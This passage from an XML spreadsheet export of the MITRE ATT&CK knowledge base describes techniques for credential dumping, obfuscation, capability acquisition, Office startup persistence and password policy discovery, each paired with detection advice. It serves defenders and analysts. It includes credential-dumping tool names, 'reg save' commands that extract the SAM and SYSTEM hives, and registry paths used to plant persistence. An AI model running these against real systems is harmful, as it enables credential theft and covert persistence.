* Using the in-built Windows tool, ntdsutil.exe
* Invoke-NinjaCopy
</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1003/003</t>
  </si>
  <si>
    <t>14 December 2020</t>
  </si>
  <si>
    <t>Monitor processes and command-line arguments for program execution that may be indicative of credential dumping, especially attempts to access or copy the NTDS.dit.</t>
  </si>
  <si>
    <t>T1003.007</t>
  </si>
  <si>
    <t>OS Credential Dumping: Proc Filesystem</t>
  </si>
  <si>
    <t>Adversaries may gather credentials from information stored in the Proc filesystem or &lt;code&gt;/proc&lt;/code&gt;. The Proc filesystem on Linux contains a great deal of information regarding the state of the running operating system. Processes running with root privileges can use this facility to scrape live memory of other running programs. If any of these programs store passwords in clear text or password hashes in memory, these values can then be harvested for either usage or brute force attacks, respectively.
This functionality has been implemented in the MimiPenguin(Citation: MimiPenguin GitHub May 2017), an open source tool inspired by Mimikatz. The tool dumps process memory, then harvests passwords and hashes by looking for text strings and regex patterns for how given applications such as Gnome Keyring, sshd, and Apache use memory to store such authentication artifacts.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1003/007</t>
  </si>
  <si>
    <t>To obtain the passwords and hashes stored in memory, processes must open a maps file in the /proc filesystem for the process being analyzed. This file is stored under the path &lt;code&gt;/proc/\*/maps&lt;/code&gt;, where the &lt;code&gt;\*&lt;/code&gt; directory is the unique pid of the program being interrogated for such authentication data. The AuditD monitoring tool, which ships stock in many Linux distributions, can be used to watch for hostile processes opening this file in the proc file system, alerting on the pid, process name, and arguments of such programs.</t>
  </si>
  <si>
    <t>T1003.002</t>
  </si>
  <si>
    <t>OS Credential Dumping: Security Account Manager</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database either through in-memory techniques or through the Windows Registry where the SAM database is stored. The SAM is a database file that contains local accounts for the host, typically those found with the &lt;code&gt;net user&lt;/code&gt; command. Enumerating the SAM database requires SYSTEM level access.
A number of tools can be used to retrieve the SAM file through in-memory techniques:
* pwdumpx.exe
* [gsecdump](https://attack.mitre.org/software/S0008)
* [Mimikatz](https://attack.mitre.org/software/S0002)
* secretsdump.py
Alternatively, the SAM can be extracted from the Registry with Reg:
* &lt;code&gt;reg save HKLM\sam sam&lt;/code&gt;
* &lt;code&gt;reg save HKLM\system system&lt;/code&gt;
Creddump7 can then be used to process the SAM database locally to retrieve hashes.(Citation: GitHub Creddump7)
Notes: 
* RID 500 account is the local, built-in administrator.
* RID 501 is the guest account.
* User accounts start with a RID of 1,000+.
</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1003/002</t>
  </si>
  <si>
    <t>Hash dumpers open the Security Accounts Manager (SAM) on the local file system (&lt;code&gt;%SystemRoot%/system32/config/SAM&lt;/code&gt;) or create a dump of the Registry SAM key to access stored account password hashes. Some hash dumpers will open the local file system as a device and parse to the SAM table to avoid file access defenses. Others will make an in-memory copy of the SAM table before reading hashes. Detection of compromised [Valid Accounts](https://attack.mitre.org/techniques/T1078) in-use by adversaries may help as well.</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Access, Windows Registry: Windows Registry Key Access</t>
  </si>
  <si>
    <t>T1027</t>
  </si>
  <si>
    <t>Obfuscated Files or Information</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses. 
Payloads may be compressed, archived, or encrypted in order to avoid detection. These payloads may be used during Initial Access or later to mitigate detection. Sometimes a user's action may be required to open and [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) for [User Execution](https://attack.mitre.org/techniques/T1204). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. (Citation: Volexity PowerDuke November 2016) Adversaries may also used compressed or archived scripts, such as JavaScript. 
Portions of files can also be encoded to hide the plain-text strings that would otherwise help defenders with discovery. (Citation: Linux/Cdorked.A We Live Security Analysis) Payloads may also be split into separate, seemingly benign files that only reveal malicious functionality when reassembled. (Citation: Carbon Black Obfuscation Sept 2016)
Adversaries may also obfuscate commands executed from payloads or directly via a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059). Environment variables, aliases, characters, and other platform/language specific semantics can be used to evade signature based detections and application control mechanisms. (Citation: FireEye Obfuscation June 2017) (Citation: FireEye Revoke-Obfuscation July 2017)(Citation: PaloAlto EncodedCommand March 2017) </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1027</t>
  </si>
  <si>
    <t xml:space="preserve">Detection of file obfuscation is difficult unless artifacts are left behind by the obfuscation process that are uniquely detectable with a signature. If detection of the obfuscation itself is not possible, it may be possible to detect the malicious activity that caused the obfuscated file (for example, the method that was used to write, read, or modify the file on the file system). 
Flag and analyze commands containing indicators of obfuscation and known suspicious syntax such as uninterpreted escape characters like '''^''' and '''"'''. Windows' Sysmon and Event ID 4688 displays command-line arguments for processes. Deobfuscation tools can be used to detect these indicators in files/payloads. (Citation: GitHub Revoke-Obfuscation) (Citation: FireEye Revoke-Obfuscation July 2017) (Citation: GitHub Office-Crackros Aug 2016) 
Obfuscation used in payloads for Initial Access can be detected at the network. Use network intrusion detection systems and email gateway filtering to identify compressed and encrypted attachments and scripts. Some email attachment detonation systems can open compressed and encrypted attachments. Payloads delivered over an encrypted connection from a website require encrypted network traffic inspection. 
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 </t>
  </si>
  <si>
    <t>Command: Command Execution, Command: Command Execution, File: File Content, File: File Creation, File: File Metadata, Process: Process Creation</t>
  </si>
  <si>
    <t>Christiaan Beek, @ChristiaanBeek; Red Canary</t>
  </si>
  <si>
    <t>Application control, Application control by file name or path, Host forensic analysis, Host intrusion prevention systems, Log analysis, Signature-based detection</t>
  </si>
  <si>
    <t>T1027.001</t>
  </si>
  <si>
    <t>Obfuscated Files or Information: Binary Padding</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may use binary padding to add junk data and change the on-disk representation of malware. This can be done without affecting the functionality or behavior of a binary, but can increase the size of the binary beyond what some security tools are capable of handling due to file size limitations. 
Binary padding effectively changes the checksum of the file and can also be used to avoid hash-based blocklists and static anti-virus signatures.(Citation: ESET OceanLotus) The padding used is commonly generated by a function to create junk data and then appended to the end or applied to sections of malware.(Citation: Securelist Malware Tricks April 2017) Increasing the file size may decrease the effectiveness of certain tools and detection capabilities that are not designed or configured to scan large files. This may also reduce the likelihood of being collected for analysis. Public file scanning services, such as VirusTotal, limits the maximum size of an uploaded file to be analyzed.(Citation: VirusTotal FAQ) </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1027/001</t>
  </si>
  <si>
    <t>05 February 2020</t>
  </si>
  <si>
    <t xml:space="preserve">Depending on the method used to pad files, a file-based signature may be capable of detecting padding using a scanning or on-access based tool.  When executed, the resulting process from padded files may also exhibit other behavior characteristics of being used to conduct an intrusion such as system and network information Discovery or Lateral Movement, which could be used as event indicators that point to the source file. </t>
  </si>
  <si>
    <t>File: File Content, File: File Metadata</t>
  </si>
  <si>
    <t>Martin Jirkal, ESET</t>
  </si>
  <si>
    <t>Anti-virus, Signature-based detection</t>
  </si>
  <si>
    <t>T1027.004</t>
  </si>
  <si>
    <t>Obfuscated Files or Information: Compile After Delivery</t>
  </si>
  <si>
    <t>Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as uncompiled code. Text-based source code files may subvert analysis and scrutiny from protections targeting executables/binaries. These payloads will need to be compiled before execution; typically via native utilities such as csc.exe or GCC/MinGW.(Citation: ClearSky MuddyWater Nov 2018)
Source code payloads may also be encrypted, encoded, and/or embedded within other files, such as those delivered as a [Phishing](https://attack.mitre.org/techniques/T1566). Payloads may also be delivered in formats unrecognizable and inherently benign to the native OS (ex: EXEs on macOS/Linux) before later being (re)compiled into a proper executable binary with a bundled compiler and execution framework.(Citation: TrendMicro WindowsAppMac)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1027/004</t>
  </si>
  <si>
    <t>Monitor the execution file paths and command-line arguments for common compilers, such as csc.exe and GCC/MinGW, and correlate with other suspicious behavior to reduce false positives from normal user and administrator behavior. The compilation of payloads may also generate file creation and/or file write events. Look for non-native binary formats and cross-platform compiler and execution frameworks like Mono and determine if they have a legitimate purpose on the system.(Citation: TrendMicro WindowsAppMac) Typically these should only be used in specific and limited cases, like for software development.</t>
  </si>
  <si>
    <t>Praetorian; Ye Yint Min Thu Htut, Offensive Security Team, DBS Bank</t>
  </si>
  <si>
    <t>Anti-virus, Binary Analysis, Host intrusion prevention systems, Signature-based detection, Static File Analysis</t>
  </si>
  <si>
    <t>T1027.005</t>
  </si>
  <si>
    <t>Obfuscated Files or Information: Indicator Removal from Tools</t>
  </si>
  <si>
    <t>Adversaries may remove indicators from tools if they believe their malicious tool was detected, quarantined, or otherwise curtailed. They can modify the tool by removing the indicator and using the updated version that is no longer detected by the target's defensive systems or subsequent targets that may use similar systems.
A good example of this is when malware is detected with a file signature and quarantined by anti-virus software. An adversary who can determine that the malware was quarantined because of its file signature may modify the file to explicitly avoid that signature, and then re-use the malware.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1027/005</t>
  </si>
  <si>
    <t>The first detection of a malicious tool may trigger an anti-virus or other security tool alert. Similar events may also occur at the boundary through network IDS, email scanning appliance, etc. The initial detection should be treated as an indication of a potentially more invasive intrusion. The alerting system should be thoroughly investigated beyond that initial alert for activity that was not detected. Adversaries may continue with an operation, assuming that individual events like an anti-virus detect will not be investigated or that an analyst will not be able to conclusively link that event to other activity occurring on the network.</t>
  </si>
  <si>
    <t>Anti-virus, Host intrusion prevention systems, Log analysis, Signature-based detection</t>
  </si>
  <si>
    <t>T1027.002</t>
  </si>
  <si>
    <t>Obfuscated Files or Information: Software Packing</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.(Citation: ESET FinFisher Jan 2018) 
Utilities used to perform software packing are called packers. Example packers are MPRESS and UPX. A more comprehensive list of known packers is available, (Citation: Wikipedia Exe Compression) but adversaries may create their own packing techniques that do not leave the same artifacts as well-known packers to evade defenses.  </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1027/002</t>
  </si>
  <si>
    <t>Use file scanning to look for known software packers or artifacts of packing techniques. Packing is not a definitive indicator of malicious activity, because legitimate software may use packing techniques to reduce binary size or to protect proprietary code.</t>
  </si>
  <si>
    <t>Filip Kafka, ESET</t>
  </si>
  <si>
    <t>Anti-virus, Heuristic detection, Signature-based detection</t>
  </si>
  <si>
    <t>T1027.003</t>
  </si>
  <si>
    <t>Obfuscated Files or Information: Steganography</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may use steganography techniques in order to prevent the detection of hidden information. Steganographic techniques can be used to hide data in digital media such as images, audio tracks, video clips, or text files.
[Duqu](https://attack.mitre.org/software/S0038) was an early example of malware that used steganography. It encrypted the gathered information from a victim's system and hid it within an image before exfiltrating the image to a C2 server.(Citation: Wikipedia Duqu) 
By the end of 2017, a threat group used &lt;code&gt;Invoke-PSImage&lt;/code&gt; to hide [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands in an image file (.png) and execute the code on a victim's system. In this particular case the [PowerShell](https://attack.mitre.org/techniques/T1059/001) code downloaded another obfuscated script to gather intelligence from the victim's machine and communicate it back to the adversary.(Citation: McAfee Malicious Doc Targets Pyeongchang Olympics)  </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1027/003</t>
  </si>
  <si>
    <t>Detection of steganography is difficult unless artifacts are left behind by the obfuscation process that are detectable with a known signature. Look for strings are other signatures left in system artifacts related to decoding steganography.</t>
  </si>
  <si>
    <t>File: File Content</t>
  </si>
  <si>
    <t>T1588</t>
  </si>
  <si>
    <t>Obtain Capabilities</t>
  </si>
  <si>
    <t>Adversaries may buy and/or steal capabilities that can be used during targeting. Rather than developing their own capabilities in-house, adversaries may purchase, freely download, or steal them. Activities may include the acquisition of malware, software (including licenses), exploits, certificates, and information relating to vulnerabilities. Adversaries may obtain capabilities to support their operations throughout numerous phases of the adversary lifecycle.
In addition to downloading free malware, software, and exploits from the internet, adversaries may purchase these capabilities from third-party entities. Third-party entities can include technology companies that specialize in malware and exploits, criminal marketplaces, or from individuals.(Citation: NationsBuying)(Citation: PegasusCitizenLab)
In addition to purchasing capabilities, adversaries may steal capabilities from third-party entities (including other adversaries). This can include stealing software licenses, malware, SSL/TLS and code-signing certificates, or raiding closed databases of vulnerabilities or exploits.(Citation: DiginotarCompromise)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1588</t>
  </si>
  <si>
    <t>T1588.003</t>
  </si>
  <si>
    <t>Obtain Capabilities: Code Signing Certificates</t>
  </si>
  <si>
    <t>Adversaries may buy and/or steal code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Code signing provides a level of authenticity for a program from the developer and a guarantee that the program has not been tampered with.(Citation: Wikipedia Code Signing) Users and/or security tools may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is.
Prior to [Code Signing](https://attack.mitre.org/techniques/T1553/002), adversaries may purchase or steal code signing certificates for use in operations. The purchase of code signing certificates may be done using a front organization or using information stolen from a previously compromised entity that allows the adversary to validate to a certificate provider as that entity. Adversaries may also steal code signing materials directly from a compromised third-party.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1588/003</t>
  </si>
  <si>
    <t>T1588.004</t>
  </si>
  <si>
    <t>Obtain Capabilities: Digital Certificates</t>
  </si>
  <si>
    <t>Adversaries may buy and/or steal SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They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with its owner.
Adversaries may purchase or steal SSL/TLS certificates to further their operations, such as encrypting C2 traffic (ex: [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002) with [Web Protocols](https://attack.mitre.org/techniques/T1071/001)) or even enabling [Man-in-the-Middle](https://attack.mitre.org/techniques/T1557) if the certificate is trusted or otherwise added to the root of trust (i.e. [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004)). The purchase of digital certificates may be done using a front organization or using information stolen from a previously compromised entity that allows the adversary to validate to a certificate provider as that entity. Adversaries may also steal certificate materials directly from a compromised third-party, including from certificate authorities.(Citation: DiginotarCompromise) Adversaries may register or hijack domains that they will later purchase an SSL/TLS certificate for.
Certificate authorities exist that allow adversaries to acquire SSL/TLS certificates, such as domain validation certificates, for free.(Citation: Let's Encrypt FAQ)
After obtaining a digital certificate, an adversary may then install that certificate (see [Install Digital Certificate](https://attack.mitre.org/techniques/T1608/003)) on infrastructure under their control.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1588/004</t>
  </si>
  <si>
    <t>Consider use of services that may aid in the tracking of newly issued certificates and/or certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017) Some server-side components of adversary tools may have default values set for SSL/TLS certificates.(Citation: Recorded Future Beacon Certificates)
Detection efforts may be focused on related behaviors, such as [Web Protocols](https://attack.mitre.org/techniques/T1071/001), [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002), and/or [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004).</t>
  </si>
  <si>
    <t>T1588.005</t>
  </si>
  <si>
    <t>Obtain Capabilities: Exploits</t>
  </si>
  <si>
    <t>Adversaries may buy, steal, or download exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than developing their own exploits, an adversary may find/modify exploits from online or purchase them from exploit vendors.(Citation: Exploit Database)(Citation: TempertonDarkHotel)(Citation: NationsBuying)
In addition to downloading free exploits from the internet, adversaries may purchase exploits from third-party entities. Third-party entities can include technology companies that specialize in exploit development, criminal marketplaces (including exploit kits), or from individuals.(Citation: PegasusCitizenLab)(Citation: Wired SandCat Oct 2019) In addition to purchasing exploits, adversaries may steal and repurpose exploits from third-party entities (including other adversaries).(Citation: TempertonDarkHotel)
An adversary may monitor exploit provider forums to understand the state of existing, as well as newly discovered, exploits. There is usually a delay between when an exploit is discovered and when it is made public. An adversary may target the systems of those known to conduct exploit research and development in order to gain that knowledge for use during a subsequent operation.
Adversaries may use exploits during various phases of the adversary lifecycle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</si>
  <si>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https://attack.mitre.org/techniques/T1588/005</t>
  </si>
  <si>
    <t xml:space="preserve">
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on behaviors relating to the use of exploits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</si>
  <si>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T1588.001</t>
  </si>
  <si>
    <t>Obtain Capabilities: Malware</t>
  </si>
  <si>
    <t>Adversaries may buy, steal, or download malware that can be used during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, packers, and C2 protocols. Adversaries may acquire malware to support their operations, obtaining a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.
In addition to downloading free malware from the internet, adversaries may purchase these capabilities from third-party entities. Third-party entities can include technology companies that specialize in malware development, criminal marketplaces (including Malware-as-a-Service, or MaaS), or from individuals. In addition to purchasing malware, adversaries may steal and repurpose malware from third-party entities (including other adversaries).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1588/001</t>
  </si>
  <si>
    <t>T1588.002</t>
  </si>
  <si>
    <t>Obtain Capabilities: Tool</t>
  </si>
  <si>
    <t>Adversaries may buy, steal, or download software tools that can be used during targeting. Tools can be open or closed source, free or commercial. A tool can be used for malicious purposes by an adversary, but (unlike malware) were not intended to be used for those purposes (ex: [PsExec](https://attack.mitre.org/software/S0029)). Tool acquisition can involve the procurement of commercial software licenses, including for red teaming tools such as [Cobalt Strike](https://attack.mitre.org/software/S0154). Commercial software may be obtained through purchase, stealing licenses (or licensed copies of the software), or cracking trial versions.(Citation: Recorded Future Beacon 2019)
Adversaries may obtain tools to support their operations, including to support execution of post-compromise behaviors. In addition to freely downloading or purchasing software, adversaries may steal software and/or software licenses from third-party entities (including other adversaries).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1588/002</t>
  </si>
  <si>
    <t>T1588.006</t>
  </si>
  <si>
    <t>Obtain Capabilities: Vulnerabilities</t>
  </si>
  <si>
    <t>Adversaries may acquire information about vulnerabilities that can be used during targeting. A vulnerability is a weakness in computer hardware or software that can, potentially, be exploited by an adversary to cause unintended or unanticipated behavior to occur. Adversaries may find vulnerability information by searching open databases or gaining access to closed vulnerability databases.(Citation: National Vulnerability Database)
An adversary may monitor vulnerability disclosures/databases to understand the state of existing, as well as newly discovered, vulnerabilities. There is usually a delay between when a vulnerability is discovered and when it is made public. An adversary may target the systems of those known to conduct vulnerability research (including commercial vendors). Knowledge of a vulnerability may cause an adversary to search for an existing exploit (i.e. [Exploits](https://attack.mitre.org/techniques/T1588/005)) or to attempt to develop one themselves (i.e. [Exploits](https://attack.mitre.org/techniques/T1587/004)).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1588/006</t>
  </si>
  <si>
    <t>Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on behaviors relating to the potential use of exploits for vulnerabilities (i.e. [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211), [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212), [Exploitation of Remote Services](https://attack.mitre.org/techniques/T1210), and [Application or System Exploitation](https://attack.mitre.org/techniques/T1499/004)).</t>
  </si>
  <si>
    <t>T1137</t>
  </si>
  <si>
    <t>Office Application Startup</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</si>
  <si>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
A variety of features have been discovered in Outlook that can be abused to obtain persistence, such as Outlook rules, forms, and Home Page.(Citation: SensePost Ruler GitHub) These persistence mechanisms can work within Outlook or be used through Office 365.(Citation: TechNet O365 Outlook Rules)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1137</t>
  </si>
  <si>
    <t>Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior. If winword.exe is the parent process for suspicious processes and activity relating to other adversarial techniques, then it could indicate that the application was used maliciously.
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persistence.(Citation: CrowdStrike Outlook Forms)(Citation: Outlook Today Home Page)
Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, Command: Command Execution, File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>Loic Jaquemet; Microsoft Threat Intelligence Center (MSTIC); Nick Carr, FireEye; Praetorian; Ricardo Dias; Sahar Shukrun</t>
  </si>
  <si>
    <t>T1137.006</t>
  </si>
  <si>
    <t>Office Application Startup: Add-ins</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may abuse Microsoft Office add-ins to obtain persistence on a compromised system. Office add-ins can be used to add functionality to Office programs. (Citation: Microsoft Office Add-ins) There are different types of add-ins that can be used by the various Office products; including Word/Excel add-in Libraries (WLL/XLL), VBA add-ins, Office Component Object Model (COM) add-ins, automation add-ins, VBA Editor (VBE), Visual Studio Tools for Office (VSTO) add-ins, and Outlook add-ins. (Citation: MRWLabs Office Persistence Add-ins)(Citation: FireEye Mail CDS 2018)
Add-ins can be used to obtain persistence because they can be set to execute code when an Office application starts. </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1137/006</t>
  </si>
  <si>
    <t>07 November 2019</t>
  </si>
  <si>
    <t>Monitor and validate the Office trusted locations on the file system and audit the Registry entries relevant for enabling add-ins.(Citation: GlobalDotName Jun 2019)(Citation: MRWLabs Office Persistence Add-ins)
Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Creation, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>T1137.001</t>
  </si>
  <si>
    <t>Office Application Startup: Office Template Macros</t>
  </si>
  <si>
    <t>Adversaries may abuse Microsoft Office templates to obtain persistence on a compromised system. Microsoft Office contains templates that are part of common Office applications and are used to customize styles. The base templates within the application are used each time an application starts. (Citation: Microsoft Change Normal Template)
Office Visual Basic for Applications (VBA) macros (Citation: MSDN VBA in Office) can be inserted into the base template and used to execute code when the respective Office application starts in order to obtain persistence. Examples for both Word and Excel have been discovered and published. By default, Word has a Normal.dotm template created that can be modified to include a malicious macro. Excel does not have a template file created by default, but one can be added that will automatically be loaded.(Citation: enigma0x3 normal.dotm)(Citation: Hexacorn Office Template Macros) Shared templates may also be stored and pulled from remote locations.(Citation: GlobalDotName Jun 2019) 
Word Normal.dotm location:&lt;br&gt;
&lt;code&gt;C:\Users\&amp;lt;username&amp;gt;\AppData\Roaming\Microsoft\Templates\Normal.dotm&lt;/code&gt;
Excel Personal.xlsb location:&lt;br&gt;
&lt;code&gt;C:\Users\&amp;lt;username&amp;gt;\AppData\Roaming\Microsoft\Excel\XLSTART\PERSONAL.XLSB&lt;/code&gt;
Adversaries may also change the location of the base template to point to their own by hijacking the application's search order, e.g. Word 2016 will first look for Normal.dotm under &lt;code&gt;C:\Program Files (x86)\Microsoft Office\root\Office16\&lt;/code&gt;, or by modifying the GlobalDotName registry key. By modifying the GlobalDotName registry key an adversary can specify an arbitrary location, file name, and file extension to use for the template that will be loaded on application startup. To abuse GlobalDotName, adversaries may first need to register the template as a trusted document or place it in a trusted location.(Citation: GlobalDotName Jun 2019) 
An adversary may need to enable macros to execute unrestricted depending on the system or enterprise security policy on use of macros.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1137/001</t>
  </si>
  <si>
    <t>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persistence.(Citation: CrowdStrike Outlook Forms)(Citation: Outlook Today Home Page) Modification to base templates, like Normal.dotm, should also be investigated since the base templates should likely not contain VBA macros. Changes to the Office macro security settings should also be investigated.(Citation: GlobalDotName Jun 2019)</t>
  </si>
  <si>
    <t>T1137.002</t>
  </si>
  <si>
    <t>Office Application Startup: Office Test</t>
  </si>
  <si>
    <t>Adversaries may abuse the Microsoft Office "Office Test" Registry key to obtain persistence on a compromised system. An Office Test Registry location exists that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started. This Registry key is thought to be used by Microsoft to load DLLs for testing and debugging purposes while developing Office applications. This Registry key is not created by default during an Office installation.(Citation: Hexacorn Office Test)(Citation: Palo Alto Office Test Sofacy)
There exist user and global Registry keys for the Office Test feature:
* &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Office test\Special\Perf&lt;/code&gt;
* &lt;code&gt;HKEY_LOCAL_MACHINE\Software\Microsoft\Office test\Special\Perf&lt;/code&gt;
Adversaries may add this Registry key and specify a malicious DLL that will be executed whenever an Office application, such as Word or Excel, is started.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1137/002</t>
  </si>
  <si>
    <t>Monitor for the creation of the Office Test Registry key. Many Office-related persistence mechanisms require changes to the Registry and for binaries, files, or scripts to be written to disk or existing files modified to include malicious scripts. Collect events related to Registry key creation and modification for keys that could be used for Office-based persistence. Since v13.52, Autoruns can detect tasks set up using the Office Test Registry key.(Citation: Palo Alto Office Test Sofacy)
Consider monitoring Office processes for anomalous DLL loads.</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>T1137.003</t>
  </si>
  <si>
    <t>Office Application Startup: Outlook Forms</t>
  </si>
  <si>
    <t>Adversaries may abuse Microsoft Outlook forms to obtain persistence on a compromised system. Outlook forms are used as templates for presentation and functionality in Outlook messages. Custom Outlook forms can be created that will execute code when a specifically crafted email is sent by an adversary utilizing the same custom Outlook form.(Citation: SensePost Outlook Forms)
Once malicious forms have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious forms will execute when an adversary sends a specifically crafted email to the user.(Citation: SensePost Outlook Forms)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1137/003</t>
  </si>
  <si>
    <t>Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, Command: Command Execution, Process: Process Creation</t>
  </si>
  <si>
    <t>T1137.004</t>
  </si>
  <si>
    <t>Office Application Startup: Outlook Home Page</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may abuse Microsoft Outlook's Home Page feature to obtain persistence on a compromised system. Outlook Home Page is a legacy feature used to customize the presentation of Outlook folders. This feature allows for an internal or external URL to be loaded and presented whenever a folder is opened. A malicious HTML page can be crafted that will execute code when loaded by Outlook Home Page.(Citation: SensePost Outlook Home Page)
Once malicious home pages have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious Home Pages will execute when the right Outlook folder is loaded/reloaded.(Citation: SensePost Outlook Home Page)
</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1137/004</t>
  </si>
  <si>
    <t>T1137.005</t>
  </si>
  <si>
    <t>Office Application Startup: Outlook Rules</t>
  </si>
  <si>
    <t>Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)
Once malicious rules have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious rules will execute when an adversary sends a specifically crafted email to the user.(Citation: SilentBreak Outlook Rules)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1137/005</t>
  </si>
  <si>
    <t>T1201</t>
  </si>
  <si>
    <t>Password Policy Discovery</t>
  </si>
  <si>
    <t>Adversaries may attempt to access detailed information about the password policy used within an enterprise network. Password policies for networks are a way to enforce complex passwords that are difficult to guess or crack through [Brute Force](https://attack.mitre.org/techniques/T1110).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
Password policies can be set and discovered on Windows, Linux, and macOS systems via various command shell utilities such as &lt;code&gt;net accounts (/domain)&lt;/code&gt;, &lt;code&gt;Get-ADDefaultDomainPasswordPolicy&lt;/code&gt;, &lt;code&gt;chage -l &lt;username&gt;&lt;/code&gt;, &lt;code&gt;cat /etc/pam.d/common-password&lt;/code&gt;, and &lt;code&gt;pwpolicy getaccountpolicies&lt;/code&gt;.(Citation: Superuser Linux Password Policies) (Citation: Jamf User Password Policies)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1201</t>
  </si>
  <si>
